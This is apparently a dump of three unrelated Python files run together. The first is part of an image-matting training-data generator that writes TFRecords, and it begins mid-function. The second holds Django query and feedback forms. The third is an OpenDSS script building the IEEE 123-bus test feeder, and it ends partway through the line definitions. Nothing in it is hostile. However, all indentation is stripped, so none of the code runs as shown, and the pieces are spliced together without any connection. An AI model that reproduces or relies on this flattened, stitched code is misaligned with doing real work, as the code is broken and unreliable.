if w <= 0 or h <= 0:
return 0, 0
width_is_longer = w >= h
side_long, side_short = (w, h) if width_is_longer else (h, w)
# since the solutions for angle, -angle and 180-angle are all the same,
# if suffices to look at the first quadrant and the absolute values of sin,cos:
sin_a, cos_a = abs(math.sin(angle)), abs(math.cos(angle))
if side_short <= 2.*sin_a*cos_a*side_long or abs(sin_a-cos_a) < 1e-10:
# half constrained case: two crop corners touch the longer side,
# the other two corners are on the mid-line parallel to the longer line
x = 0.5*side_short
wr, hr = (x/sin_a, x/cos_a) if width_is_longer else (x/cos_a, x/sin_a)
else:
# fully constrained case: crop touches all 4 sides
cos_2a = cos_a*cos_a - sin_a*sin_a
wr, hr = (w*cos_a - h*sin_a)/cos_2a, (h*cos_a - w*sin_a)/cos_2a
return wr, hr
center = (fg.shape[1]//2, fg.shape[0]//2)
M = cv.getRotationMatrix2D(center, angle, 1.0)
wr, hr = rotatedRectWithMaxArea(fg.shape[1], fg.shape[0], np.deg2rad(angle))
cropped_bbox = (int(wr), int(hr))
rotated_fg = cv.warpAffine(fg, M, fg.shape[::-1])
rotated_alpha = cv.warpAffine(alpha, M, alpha.shape[::-1])
cropped_fg = rotated_fg[center[1]-cropped_bbox[1]//2:center[1]+cropped_bbox[1] //
2, center[0]-cropped_bbox[0]//2:center[0]+cropped_bbox[0]//2]
cropped_alpha = rotated_alpha[center[1] - cropped_bbox[1] // 2: center[1] +
cropped_bbox[1] // 2, center[0] -
cropped_bbox[0] // 2: center[0] +
cropped_bbox[0] // 2]
return cropped_fg, cropped_alpha
def compose(fg, bg, alpha):
MAX_BLUR_TIMES = 5
fg = fg.astype(np.float)
bg = bg.astype(np.float)
fg_blur_times = np.random.randint(1, MAX_BLUR_TIMES+1)
bg_blur_times = np.random.randint(1, MAX_BLUR_TIMES+1)
filter = [7, 11, 15]
# fg_filter = filter[np.random.randint(0, 3)]
# bg_filter = filter[np.random.randint(0, 3)]
fg_filter = filter[0]
bg_filter = filter[0]
fg_alpha = fg*alpha
# Background Blur
bg_blur = bg
for i in range(bg_blur_times):
bg_blur = cv.GaussianBlur(
bg_blur, (bg_filter, bg_filter), (bg_filter-1)/3)
bg_blur_alpha = bg_blur*(1-alpha)
result1 = fg_alpha + bg_blur_alpha
result1 = np.clip(result1, 0, 255)
# Foreground Blur
fg_alpha_blur = fg_alpha
alpha_blur = alpha
for i in range(fg_blur_times):
fg_alpha_blur = cv.GaussianBlur(
fg_alpha_blur, (fg_filter, fg_filter), (fg_filter-1)/3)
alpha_blur = cv.GaussianBlur(
alpha_blur, (fg_filter, fg_filter), (fg_filter-1)/3)
result2 = fg_alpha_blur*(alpha_blur) + bg*(1-alpha_blur)
result2 = np.clip(result2, 0, 255)
return result1.astype(np.uint8), result2.astype(np.uint8), alpha_blur
def get_grid_bbox(img_shape, grid_size, patch_size):
row_cond = (img_shape[0] - patch_size[0] - grid_size[0] + 1) >= 0
col_cond = (img_shape[1] - patch_size[1] - grid_size[1] + 1) >= 0
if not (row_cond and col_cond):
return []
# row
cord_rows = []
val_row_size = img_shape[0] - patch_size[0] + 1
row_space = val_row_size // grid_size[0]
for i in range(grid_size[0]):
cord_rows.append(i*row_space)
cord_rows.append(val_row_size)
# column
cord_cols = []
val_col_size = img_shape[1] - patch_size[1] + 1
col_space = val_col_size // grid_size[1]
for i in range(grid_size[1]):
cord_cols.append(i*col_space)
cord_cols.append(val_col_size)
grids = []
for i in range(grid_size[0]):
for j in range(grid_size[1]):
lt = [cord_rows[i], cord_cols[j]]
rb = [cord_rows[i+1]-1, cord_cols[j+1]-1]
grids.append(bbox(lt, rb))
shifted_grids = []
for i in range(len(grids)):
shifted_grids.append(grids[i].shift(
(patch_size[0]//2-1, patch_size[1]//2-1)))
return shifted_grids
def get_high_variance_patch(img, patch_size, quantity=1, grid_size=(20, 20)):
edges_map = cv.Canny(img, 30, 90, apertureSize=7)
grids = get_grid_bbox(img.shape, grid_size, patch_size)
grad_grids = []
for g in grids:
tmp_crop = g.get_crop(edges_map)
if tmp_crop.max() > 0:
grad_grids.append(g)
patches = []
if len(grad_grids) > 0:
for i in range(quantity):
tmp_grid = grad_grids[np.random.randint(len(grad_grids))]
tmp_crop = tmp_grid.get_crop(edges_map)
y_s, x_s = np.where(tmp_crop > 0)
tmp_point = np.random.randint(len(y_s))
y, x = y_s[tmp_point], x_s[tmp_point]
y = y + tmp_grid.lt[0]
x = x + tmp_grid.lt[1]
lt = (y - patch_size[0] // 2 + 1, x - patch_size[1] // 2 + 1)
rb = (lt[0] + patch_size[0] - 1, lt[1] + patch_size[1] - 1)
patches.append(bbox(lt, rb))
return patches
def get_random_patch(img, patch_size, quantity=1):
lts = []
for i in range(quantity):
lt = (
np.random.randint(img.shape[0] - patch_size[0] + 1),
np.random.randint(img.shape[1] - patch_size[1] + 1))
rb = (lt[0]+patch_size[0]-1, lt[1]+patch_size[1]-1)
lts.append(bbox(lt, rb))
return lts
# TFRecords
def _bytes_feature(value):
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def _int64_feature(value):
return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))
def _float32_feature(value):
return tf.train.Feature(float_list=tf.train.FloatList(value=value))
def writeTFRecord(tfrWriter, p1, p2, label):
# write data into TFRecord Writer
# image serialization
str1 = p1.tostring()
str2 = p2.tostring()
str3 = label.tostring()
# Create features
tf_features = tf.train.Features(feature={'p1': _bytes_feature(
str1), 'p2': _bytes_feature(str2), 'label': _bytes_feature(str3)})
# Create Example
tf_example = tf.train.Example(features=tf_features)
tfrWriter.write(tf_example.SerializeToString())
def parseDataset(example_proto):
# data parsing lambda for parse data of tfrecords file
disc = {
'p1': tf.io.FixedLenFeature(shape=(), dtype=tf.string),
'p2': tf.io.FixedLenFeature(shape=(), dtype=tf.string),
'label': tf.io.FixedLenFeature(shape=(), dtype=tf.string)
}
parse_example = tf.io.parse_single_example(example_proto, disc)
parse_example['p1'] = tf.io.decode_raw(parse_example['p1'], tf.float32)
parse_example['p1'] = tf.reshape(
parse_example['p1'], (320, 320, 1))
parse_example['p2'] = tf.io.decode_raw(parse_example['p2'], tf.float32)
parse_example['p2'] = tf.reshape(
parse_example['p2'], (320, 320, 1))
parse_example['label'] = tf.io.decode_raw(
parse_example['label'], tf.float32)
parse_example['label'] = tf.reshape(
parse_example['label'], (320, 320, 1))
return parse_example
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='')
parser.add_argument(
'--fg_dir', dest='fg_dir', type=str, default='fg',
help='directory of the foreground images')
parser.add_argument(
'--bg_dir', dest='bg_dir', type=str, default='bg',
help='directory of the background images')
parser.add_argument(
'--alpha_dir', dest='alpha_dir', type=str, default='alpha',
help='directory of the alpha matting (ground truth)')
parser.add_argument('--output', dest='output', type=str,
default='train.tfrecords',
help='file of processed data')
parser.add_argument('--num', dest='num', type=int,
default='100000',
help='quantity of data')
args = parser.parse_args()
print(args)
fg_dir = args.fg_dir
bg_dir = args.bg_dir
alpha_dir = args.alpha_dir
image_num = int(args.num)
tfrecord_path = path.join('.', args.output)
writer = tf.io.TFRecordWriter(tfrecord_path)
fg_names = listdir(fg_dir)
fg_imgs = []
alpha_imgs = []
for fg_name in fg_names:
fg_path = path.join(fg_dir, fg_name)
alpha_path = path.join(alpha_dir, fg_name)
fg = cv.imread(fg_path, cv.IMREAD_GRAYSCALE)
fg_imgs.append(fg)
alpha_imgs.append(cv.imread(alpha_path, cv.IMREAD_GRAYSCALE))
bgs = listdir(bg_dir)
for i in range(image_num):
bg_name = bgs[np.random.randint(len(bgs))]
bg_path = path.join(bg_dir, bg_name)
bg = cv.imread(bg_path, cv.IMREAD_GRAYSCALE)
print(f"{i}/{image_num}", f"{i/image_num*100:.2}%", end='\r')
# Read fg Image paths
rand_fg = np.random.randint(0, len(fg_imgs))
fg = fg_imgs[rand_fg]
alpha = alpha_imgs[rand_fg]
# FG rotation
fg, alpha = rotate_Fg_Alpha(fg, alpha, np.random.rand()*20-10)
# FG too small
if fg.shape[0] <= 340 or fg.shape[1] <= 340:
r = min(fg.shape[0] / 340, fg.shape[1] / 340)
new_shape = (
math.ceil(fg.shape[1] / r),
math.ceil(fg.shape[0] / r))
fg = cv.resize(
fg, new_shape, fx=1 / r, fy=1 / r,
interpolation=cv.INTER_CUBIC)
alpha = cv.resize(
alpha, new_shape, fx=1 / r, fy=1 / r,
interpolation=cv.INTER_CUBIC)
# Composition
wratio = fg.shape[1] / bg.shape[1]
hratio = fg.shape[0] / bg.shape[0]
ratio = wratio if wratio > hratio else hratio
bg_size = (math.ceil(bg.shape[1]*ratio),
math.ceil(bg.shape[0]*ratio))
bg = cv.resize(bg, bg_size, fx=ratio, fy=ratio,
interpolation=cv.INTER_CUBIC)
n_alpha = alpha / 255.0
r1, r2, alpha_blur = compose(
fg, bg[:fg.shape[0], :fg.shape[1]], n_alpha)
n_r1 = r1 / 255.0
n_r2 = r2 / 255.0
imgf_gray = n_r1 * n_alpha + n_r2 * (1-n_alpha)
guided = guided_filter(imgf_gray, n_alpha, 8, 0.1)
guided = np.clip(guided, 0, 1)
# Randomly crop patches with size 320, 480, 640
lt320 = get_high_variance_patch(alpha, (320, 320), 1)
lt480 = get_high_variance_patch(alpha, (480, 480), 1)
lt640 = get_high_variance_patch(alpha, (640, 640), 1)
lts = []
if len(lt320) > 0:
lts.append({'scale': 0, 'lt': lt320})
if len(lt480) > 0:
lts.append({'scale': 1, 'lt': lt480})
if len(lt640) > 0:
lts.append({'scale': 2, 'lt': lt640})
if len(lts) == 0:
lts.append(
{'scale': 0, 'lt': get_random_patch(alpha, (320, 320))})
# Create Training Patches
rand_int = np.random.randint(len(lts))
training_patches = []
if lts[rand_int]['scale'] == 0:
# Crop 320x320
# 1. Choose range, 2. Randomly flip
lt320 = lts[rand_int]['lt']
for p in lt320:
p.random_shift(guided.shape, 10) # random shift
c1 = p.get_crop(n_r1)
c2 = p.get_crop(n_r2)
gt = p.get_crop(guided)
if np.random.rand() > 0.5:
c1 = c1[:, ::-1]
c2 = c2[:, ::-1]
gt = gt[:, ::-1]
if np.random.rand() > 0.5:
c1 = c1[::-1, :]
c2 = c2[::-1, :]
gt = gt[::-1, :]
if np.random.rand() > 0.5:
tmp = c1
c1 = c2
c2 = tmp
gt = np.abs(1.0 - gt)
training_patches.append({'c1': c1, 'c2': c2, 'gt': gt})
elif lts[rand_int]['scale'] == 1:
# Crop 480x480
# 1. Choose range, 2. Resize to 320x320, 3. Randomly flip
lt480 = lts[rand_int]['lt']
for p in lt480:
p.random_shift(guided.shape, 15) # random shift
tmp = 2.0/3.0
c1 = p.get_crop(n_r1)
c2 = p.get_crop(n_r2)
gt = p.get_crop(guided)
c1 = np.clip(cv.resize(c1, (320, 320), fx=tmp, fy=tmp,
interpolation=cv.INTER_CUBIC), 0, 1)
c2 = np.clip(cv.resize(c2, (320, 320), fx=tmp, fy=tmp,
interpolation=cv.INTER_CUBIC), 0, 1)
gt = np.clip(cv.resize(gt, (320, 320), fx=tmp, fy=tmp,
interpolation=cv.INTER_CUBIC), 0, 1)
if np.random.rand() > 0.5:
c1 = c1[:, ::-1]
c2 = c2[:, ::-1]
gt = gt[:, ::-1]
if np.random.rand() > 0.5:
c1 = c1[::-1, :]
c2 = c2[::-1, :]
gt = gt[::-1, :]
if np.random.rand() > 0.5:
tmp = c1
c1 = c2
c2 = tmp
gt = np.abs(1.0 - gt)
training_patches.append({'c1': c1, 'c2': c2, 'gt': gt})
else:
# Crop 640x640
# 1. Choose range, 2. Resize to 320x320, 3. Randomly flip
lt640 = lts[rand_int]['lt']
for p in lt640:
p.random_shift(guided.shape, 20) # random shift
c1 = p.get_crop(n_r1)
c2 = p.get_crop(n_r2)
gt = p.get_crop(guided)
c1 = np.clip(cv.resize(c1, (320, 320), fx=0.5, fy=0.5,
interpolation=cv.INTER_CUBIC), 0, 1)
c2 = np.clip(cv.resize(c2, (320, 320), fx=0.5, fy=0.5,
interpolation=cv.INTER_CUBIC), 0, 1)
gt = np.clip(cv.resize(gt, (320, 320), fx=0.5, fy=0.5,
interpolation=cv.INTER_CUBIC), 0, 1)
if np.random.rand() > 0.5:
c1 = c1[:, ::-1]
c2 = c2[:, ::-1]
gt = gt[:, ::-1]
if np.random.rand() > 0.5:
c1 = c1[::-1, :]
c2 = c2[::-1, :]
gt = gt[::-1, :]
if np.random.rand() > 0.5:
tmp = c1
c1 = c2
c2 = tmp
gt = np.abs(1.0 - gt)
training_patches.append({'c1': c1, 'c2': c2, 'gt': gt})
# write training data into tfrecords file
for patches in training_patches:
if patches['c1'].shape == (
320, 320) and patches['c2'].shape == (
320, 320) and patches['gt'].shape == (
320, 320):
patches['c1'] = patches['c1'].reshape((320, 320, 1))
patches['c2'] = patches['c2'].reshape((320, 320, 1))
patches['gt'] = patches['gt'].reshape((320, 320, 1))
patches['c1'] = patches['c1']*255.0
patches['c2'] = patches['c2']*255.0
writeTFRecord(
writer, patches['c1'].astype(np.float32),
patches['c2'].astype(np.float32),
patches['gt'].astype(np.float32))
else:
print("Shape Error!")
writer.close()
|
from django.forms import (
ModelForm, Textarea, Form, IntegerField
)
from django.core.exceptions import ValidationError
from .models import (
Query, Feedback
)
import re
EXPRESSION_TO_MATCH_ALPHABET_WITH_SPACE = re.compile('^[a-z][a-z, ]*$', re.IGNORECASE)
class TrackingForm(Form):
tracking_id = IntegerField(label='Tracking Id',
required=True,
error_messages={'required': 'Please enter your Tracking Id'}
)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.fields[ 'tracking_id' ].widget.attrs[ 'placeholder' ]="Please enter the tracking id which you recieved during query submission."
class FeedbackForm(ModelForm):
class Meta:
model = Feedback
fields = ['first_name',
'last_name',
'email',
'phone_number', 'feedback']
widgets = {
'feedback': Textarea(attrs={'cols': 80, 'rows': 10}),
}
exclude = ('user',)
help_texts = {
'first_name': '50 characters or fewer. Letters only.',
'last_name': '50 characters or fewer. Letters only.',
'email':'',
'feedback':'Required.',
}
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.fields[ 'email' ].widget.attrs[ 'placeholder' ]="example@domain.com"
self.fields[ 'first_name' ].widget.attrs[ 'placeholder' ]="Enter First Name"
self.fields[ 'last_name' ].widget.attrs[ 'placeholder' ]="Enter Last Name"
self.fields[ 'phone_number' ].widget.attrs[ 'placeholder' ]="Enter Your Phone Number"
self.fields[ 'feedback' ].widget.attrs[ 'placeholder' ]="Please Enter Your feedback we will sincerly appreciate your concern."
def clean_first_name(self):
first_name = self.cleaned_data.get("first_name")
if not first_name or EXPRESSION_TO_MATCH_ALPHABET_WITH_SPACE.match(first_name):
return first_name
else:
raise ValidationError("no special character allowed in First Name except space.")
def clean_last_name(self):
last_name = self.cleaned_data.get("last_name")
if not last_name or EXPRESSION_TO_MATCH_ALPHABET_WITH_SPACE.match(last_name):
return last_name
else:
raise ValidationError("no special character allowed in Last Name except space.")
class QueryForm(ModelForm):
class Meta:
model = Query
fields = ['first_name',
'last_name',
'email',
'phone_number', 'subject', 'query']
widgets = {
'query': Textarea(attrs={'cols': 80, 'rows': 10}),
}
exclude = ('user',)
help_texts = {'subject': 'Required. 100 characters or fewer. Letters, digits and @/./+/-/_ only.',
'first_name': 'Required. 50 characters or fewer. Letters only.',
'last_name': 'Required. 50 characters or fewer. Letters only.',
'email':'Required.',
'query':'Required.',
}
def __init__(self, *args, **kwargs):
super( QueryForm, self ).__init__(*args, **kwargs)
self.fields[ 'email' ].widget.attrs[ 'placeholder' ]="example@domain.com"
self.fields[ 'first_name' ].widget.attrs[ 'placeholder' ]="Enter First Name"
self.fields[ 'last_name' ].widget.attrs[ 'placeholder' ]="Enter Last Name"
self.fields[ 'subject' ].widget.attrs[ 'placeholder' ]="Enter Your Subject"
self.fields[ 'phone_number' ].widget.attrs[ 'placeholder' ]="Enter Your Phone Number"
self.fields[ 'query' ].widget.attrs[ 'placeholder' ]="Please Enter Your Query or Queries we will try our best to help you."
def clean_first_name(self):
first_name = self.cleaned_data.get("first_name")
if EXPRESSION_TO_MATCH_ALPHABET_WITH_SPACE.match(first_name):
return first_name
else:
raise ValidationError("no special character allowed in First Name except space.")
def clean_last_name(self):
last_name = self.cleaned_data.get("last_name")
if EXPRESSION_TO_MATCH_ALPHABET_WITH_SPACE.match(last_name):
return last_name
else:
raise ValidationError("no special character allowed in Last Name except space.")
|
import win32com.client
# ****************************************************
# * Initialize OpenDSS
# ****************************************************
# Instantiate the OpenDSS Object
try:
DSSObj = win32com.client.Dispatch("OpenDSSEngine.DSS")
except:
print ("Unable to start the OpenDSS Engine")
raise SystemExit
# Set up the Text, Circuit, and Solution Interfaces
DSSText = DSSObj.Text
DSSCircuit = DSSObj.ActiveCircuit
DSSSolution = DSSCircuit.Solution
# ! Annotated Master file for the IEEE 123-bus test case.
# !
# ! This file is meant to be invoked from the Compile command in the "Run_IEEE123Bus.DSS" file.
# !
# ! Note: DSS commands, property names, etc., are NOT case sensitive. Capitalize as you please.
# ! You should always do a "Clear" before making a new circuit:
DSSText.Command = "Clear"
DSSText.Command = "Set DefaultBaseFrequency=60"
# ! INSTANTIATE A NEW CIRCUIT AND DEFINE A STIFF 4160V SOURCE
# ! The new circuit is called "ieee123"
# ! This creates a Vsource object connected to "sourcebus". This is now the active circuit element, so
# ! you can simply continue to edit its property value.
# ! The basekV is redefined to 4.16 kV. The bus name is changed to "150" to match one of the buses in the test feeder.
# ! The source is set for 1.0 per unit and the Short circuit impedance is set to a small value (0.0001 ohms)
# ! The ~ is just shorthad for "more" for the New or Edit commands
DSSText.Command = "New object=circuit.ieee123"
DSSText.Command = "~ basekv=4.16 Bus1=150 pu=1.00 R1=0 X1=0.0001 R0=0 X0=0.0001"
# ! 3-PHASE GANGED REGULATOR AT HEAD OF FEEDER (KERSTING ASSUMES NO IMPEDANCE IN THE REGULATOR)
# ! the first line defines the 3-phase transformer to be controlled by the regulator control.
# ! The 2nd line defines the properties of the regulator control according to the test case
DSSText.Command = "new transformer.reg1a phases=3 windings=2 buses=[150 150r] conns=[wye wye] kvs=[4.16 4.16] kvas=[5000 5000] XHL=.001 %LoadLoss=0.00001 ppm=0.0"
DSSText.Command = "new regcontrol.creg1a transformer=reg1a winding=2 vreg=120 band=2 ptratio=20 ctprim=700 R=3 X=7.5"
# ! REDIRECT INPUT STREAM TO FILE CONTAINING DEFINITIONS OF LINECODES
# ! This file defines the line impedances is a similar manner to the description in the test case.
DSSText.Command = "Redirect IEEELineCodes.DSS"
# ! LINE DEFINITIONS
# ! Lines are defined by referring to a "linecode" that contains the impedances per unit length
# ! So the only properties required are the LineCode name and Length. Units are assumed to match the definition
# ! since no units property is defined in either the Linecodes file or this file.
# ! Note that it is not necessary to explicitly specify the node connections for the 3-phase lines
# ! unless they are not ".1.2.3". However, they are spelled out here for clarity.
# ! The DSS assumes .1.2.3.0.0 ... for connections of 3 or more phases.
# ! Likewise, .1 is not necessary for 1-phase lines connected to phase 1. However, if it is connected
# ! to any other phase, it must be specified. For completeness, everything is spelled out here.
# !
# ! Note that it is recommended that the "units=" property be used here and in the Linecode definition as well
# ! to avoid confusion in the future
#
# ! *** Original *** New Line.L115 Phases=3 Bus1=149.1.2.3 Bus2=1.1.2.3 LineCode=1 Length=0.4
# ! Since the default is 3-phase, the definition of this line can be simpler:
#
DSSText.Command = "New Line.L115 Bus1=149 Bus2=1 LineCode=1 Length=0.4 units=kft"
DSSText.Command = "New Line.L1 Phases=1 Bus1=1.2 Bus2=2.2 LineCode=10 Length=0.175 units=kft"
DSSText.Command = "New Line.L2 Phases=1 Bus1=1.3 Bus2=3.3 LineCode=11 Length=0.25 units=kft"
DSSText.Command = "New Line.L3 Phases=3 Bus1=1.1.2.3 Bus2=7.1.2.3 LineCode=1 Length=0.3 units=kft"
DSSText.Command = "New Line.L4 Phases=1 Bus1=3.3 Bus2=4.3 LineCode=11 Length=0.2 units=kft"
DSSText.Command = "New Line.L5 Phases=1 Bus1=3.3 Bus2=5.3 LineCode=11 Length=0.325 units=kft"
DSSText.Command = "New Line.L6 Phases=1 Bus1=5.3 Bus2=6.3 LineCode=11 Length=0.25 units=kft"
DSSText.Command = "New Line.L7 Phases=3 Bus1=7.1.2.3 Bus2=8.1.2.3 LineCode=1 Length=0.2 units=kft"
DSSText.Command = "New Line.L8 Phases=1 Bus1=8.2 Bus2=12.2 LineCode=10 Length=0.225 units=kft"
DSSText.Command = "New Line.L9 Phases=1 Bus1=8.1 Bus2=9.1 LineCode=9 Length=0.225 units=kft"
DSSText.Command = "New Line.L10 Phases=3 Bus1=8.1.2.3 Bus2=13.1.2.3 LineCode=1 Length=0.3 units=kft"
DSSText.Command = "New Line.L11 Phases=1 Bus1=9r.1 Bus2=14.1 LineCode=9 Length=0.425 units=kft"
DSSText.Command = "New Line.L12 Phases=1 Bus1=13.3 Bus2=34.3 LineCode=11 Length=0.15 units=kft"
DSSText.Command = "New Line.L13 Phases=3 Bus1=13.1.2.3 Bus2=18.1.2.3 LineCode=2 Length=0.825 units=kft"
DSSText.Command = "New Line.L14 Phases=1 Bus1=14.1 Bus2=11.1 LineCode=9 Length=0.25 units=kft"
DSSText.Command = "New Line.L15 Phases=1 Bus1=14.1 Bus2=10.1 LineCode=9 Length=0.25 units=kft"
DSSText.Command = "New Line.L16 Phases=1 Bus1=15.3 Bus2=16.3 LineCode=11 Length=0.375 units=kft"
DSSText.Command = "New Line.L17 Phases=1 Bus1=15.3 Bus2=17.3 LineCode=11 Length=0.35 units=kft"
DSSText.Command = "New Line.L18 Phases=1 Bus1=18.1 Bus2=19.1 LineCode=9 Length=0.25 units=kft"
DSSText.Command = "New Line.L19 Phases=3 Bus1=18.1.2.3 Bus2=21.1.2.3 LineCode=2 Length=0.3 units=kft"
DSSText.Command = "New Line.L20 Phases=1 Bus1=19.1 Bus2=20.1 LineCode=9 Length=0.325 units=kft"
DSSText.Command = "New Line.L21 Phases=1 Bus1=21.2 Bus2=22.2 LineCode=10 Length=0.525 units=kft"
DSSText.Command = "New Line.L22 Phases=3 Bus1=21.1.2.3 Bus2=23.1.2.3 LineCode=2 Length=0.25 units=kft"
DSSText.Command = "New Line.L23 Phases=1 Bus1=23.3 Bus2=24.3 LineCode=11 Length=0.55 units=kft"
DSSText.Command = "New Line.L24 Phases=3 Bus1=23.1.2.3 Bus2=25.1.2.3 LineCode=2 Length=0.275 units=kft"
DSSText.Command = "New Line.L25 Phases=2 Bus1=25r.1.3 Bus2=26.1.3 LineCode=7 Length=0.35 units=kft"
DSSText.Command = "New Line.L26 Phases=3 Bus1=25.1.2.3 Bus2=28.1.2.3 LineCode=2 Length=0.2 units=kft"
DSSText.Command = "New Line.L27 Phases=2 Bus1=26.1.3 Bus2=27.1.3 LineCode=7 Length=0.275 units=kft"
DSSText.Command = "New Line.L28 Phases=1 Bus1=26.3 Bus2=31.3 LineCode=11 Length=0.225 units=kft"
DSSText.Command = "New Line.L29 Phases=1 Bus1=27.1 Bus2=33.1 LineCode=9 Length=0.5 units=kft"
DSSText.Command = "New Line.L30 Phases=3 Bus1=28.1.2.3 Bus2=29.1.2.3 LineCode=2 Length=0.3 units=kft"
DSSText.Command = "New Line.L31 Phases=3 Bus1=29.1.2.3 Bus2=30.1.2.3 LineCode=2 Length=0.35 units=kft"
DSSText.Command = "New Line.L32 Phases=3 Bus1=30.1.2.3 Bus2=250.1.2.3 LineCode=2 Length=0.2 units=kft"
DSSText.Command = "New Line.L33 Phases=1 Bus1=31.3 Bus2=32.3 LineCode=11 Length=0.3 units=kft"
DSSText.Command = "New Line.L34 Phases=1 Bus1=34.3 Bus2=15.3 LineCode=11 Length=0.1 units=kft"
DSSText.Command = "New Line.L35 Phases=2 Bus1=35.1.2 Bus2=36.1.2 LineCode=8 Length=0.65 units=kft"
DSSText.Command = "New Line.L36 Phases=3 Bus1=35.1.2.3 Bus2=40.1.2.3 LineCode=1 Length=0.25 units=kft"
DSSText.Command = "New Line.L37 Phases=1 Bus1=36.1 Bus2=37.1 LineCode=9 Length=0.3 units=kft"
DSSText.Command = "New Line.L38 Phases=1 Bus1=36.2 Bus2=38.2 LineCode=10 Length=0.25 units=kft"
DSSText.Command = "New Line.L39 Phases=1 Bus1=38.2 Bus2=39.2 LineCode=10 Length=0.325 units=kft"
DSSText.Command = "New Line.L40 Phases=1 Bus1=40.3 Bus2=41.3 LineCode=11 Length=0.325 units=kft"
DSSText.Command = "New Line.L41 Phases=3 Bus1=40.1.2.3 Bus2=42.1.2.3 LineCode=1 Length=0.25 units=kft"
DSSText.Command = "New Line.L42 Phases=1 Bus1=42.2 Bus2=43.2 LineCode=10 Length=0.5 units=kft"
DSSText.Command = "New Line.L43 Phases=3 Bus1=42.1.2.3 Bus2=44.1.2.3 LineCode=1 Length=0.2 units=kft"
DSSText.Command = "New Line.L44 Phases=1 Bus1=44.1 Bus2=45.1 LineCode=9 Length=0.2 units=kft"
DSSText.Command = "New Line.L45 Phases=3 Bus1=44.1.2.3 Bus2=47.1.2.3 LineCode=1 Length=0.25 units=kft"
DSSText.Command = "New Line.L46 Phases=1 Bus1=45.1 Bus2=46.1 LineCode=9 Length=0.3 units=kft"
DSSText.Command = "New Line.L47 Phases=3 Bus1=47.1.2.3 Bus2=48.1.2.3 LineCode=4 Length=0.15 units=kft"
DSSText.Command = "New Line.L48 Phases=3 Bus1=47.1.2.3 Bus2=49.1.2.3 LineCode=4 Length=0.25 units=kft"
DSSText.Command = "New Line.L49 Phases=3 Bus1=49.1.2.3 Bus2=50.1.2.3 LineCode=4 Length=0.25 units=kft"
DSSText.Command = "New Line.L50 Phases=3 Bus1=50.1.2.3 Bus2=51.1.2.3 LineCode=4 Length=0.25 units=kft"
DSSText.Command = "New Line.L51 Phases=3 Bus1=51.1.2.3 Bus2=151.1.2.3 LineCode=4 Length=0.5 units=kft"
DSSText.Command = "New Line.L52 Phases=3 Bus1=52.1.2.3 Bus2=53.1.2.3 LineCode=1 Length=0.2 units=kft"
DSSText.Command = "New Line.L53 Phases=3 Bus1=53.1.2.3 Bus2=54.1.2.3 LineCode=1 Length=0.125 units=kft"
DSSText.Command = "New Line.L54 Phases=3 Bus1=54.1.2.3 Bus2=55.1.2.3 LineCode=1 Length=0.275 units=kft"
DSSText.Command = "New Line.L55 Phases=3 Bus1=54.1.2.3 Bus2=57.1.2.3 LineCode=3 Length=0.35 units=kft"
DSSText.Command = "New Line.L56 Phases=3 Bus1=55.1.2.3 Bus2=56.1.2.3 LineCode=1 Length=0.275 units=kft"
DSSText.Command = "New Line.L57 Phases=1 Bus1=57.2 Bus2=58.2 LineCode=10 Length=0.25 units=kft"
DSSText.Command = "New Line.L58 Phases=3 Bus1=57.1.2.3 Bus2=60.1.2.3 LineCode=3 Length=0.75 units=kft"
DSSText.Command = "New Line.L59 Phases=1 Bus1=58.2 Bus2=59.2 LineCode=10 Length=0.25 units=kft"
DSSText.Command = "New Line.L60 Phases=3 Bus1=60.1.2.3 Bus2=61.1.2.3 LineCode=5 Length=0.55 units=kft"
DSSText.Command = "New Line.L61 Phases=3 Bus1=60.1.2.3 Bus2=62.1.2.3 LineCode=12 Length=0.25 units=kft"
DSSText.Command = "New Line.L62 Phases=3 Bus1=62.1.2.3 Bus2=63.1.2.3 LineCode=12 Length=0.175 units=kft"
DSSText.Command = "New Line.L63 Phases=3 Bus1=63.1.2.3 Bus2=64.1.2.3 LineCode=12 Length=0.35 units=kft"
DSSText.Command = "New Line.L64 Phases=3 Bus1=64.1.2.3 Bus2=65.1.2.3 LineCode=12 Length=0.425 units=kft"
DSSText.Command = "New Line.L65 Phases=3 Bus1=65.1.2.3 Bus2=66.1.2.3 LineCode=12 Length=0.325 units=kft"
DSSText.Command = "New Line.L66 Phases=1 Bus1=67.1 Bus2=68.1 LineCode=9 Length=0.2 units=kft"
DSSText.Command = "New Line.L67 Phases=3 Bus1=67.1.2.3 Bus2=72.1.2.3 LineCode=3 Length=0.275 units=kft"
DSSText.Command = "New Line.L68 Phases=3 Bus1=67.1.2.3 Bus2=97.1.2.3 LineCode=3 Length=0.25 units=kft"
DSSText.Command = "New Line.L69 Phases=1 Bus1=68.1 Bus2=69.1 LineCode=9 Length=0.275 units=kft"
DSSText.Command = "New Line.L70 Phases=1 Bus1=69.1 Bus2=70.1 LineCode=9 Length=0.325 units=kft"
DSSText.Command = "New Line.L71 Phases=1 Bus1=70.1 Bus2=71.1 LineCode=9 Length=0.275 units=kft"
DSSText.Command = "New Line.L72 Phases=1 Bus1=72.3 Bus2=73.3 LineCode=11 Length=0.275 units=kft"
DSSText.Command = "New Line.L73 Phases=3 Bus1=72.1.2.3 Bus2=76.1.2.3 LineCode=3 Length=0.2 units=kft"
DSSText.Command = "New Line.L74 Phases=1 Bus1=73.3 Bus2=74.3 LineCode=11 Length=0.35 units=kft"
DSSText.Command = "New Line.L75 Phases=1 Bus1=74.3 Bus2=75.3 LineCode=11 Length=0.4 units=kft"
DSSText.Command = "New Line.L76 Phases=3 Bus1=76.1.2.3 Bus2=77.1.2.3 LineCode=6 Length=0.4 units=kft"
DSSText.Command = "New Line.L77 Phases=3 Bus1=76.1.2.3 Bus2=86.1.2.3 LineCode=3 Length=0.7 units=kft"
DSSText.Command = "New Line.L78 Phases=3 Bus1=77.1.2.3 Bus2=78.1.2.3 LineCode=6 Length=0.1 units=kft"
DSSText.Command = "New Line.L79 Phases=3 Bus1=78.1.2.3 Bus2=79.1.2.3 LineCode=6 Length=0.225 units=kft"
DSSText.Command = "New Line.L80 Phases=3 Bus1=78.1.2.3 Bus2=80.1.2.3 LineCode=6 Length=0.475 units=kft"
DSSText.Command = "New Line.L81 Phases=3 Bus1=80.1.2.3 Bus2=81.1.2.3 LineCode=6 Length=0.175 units=kft"
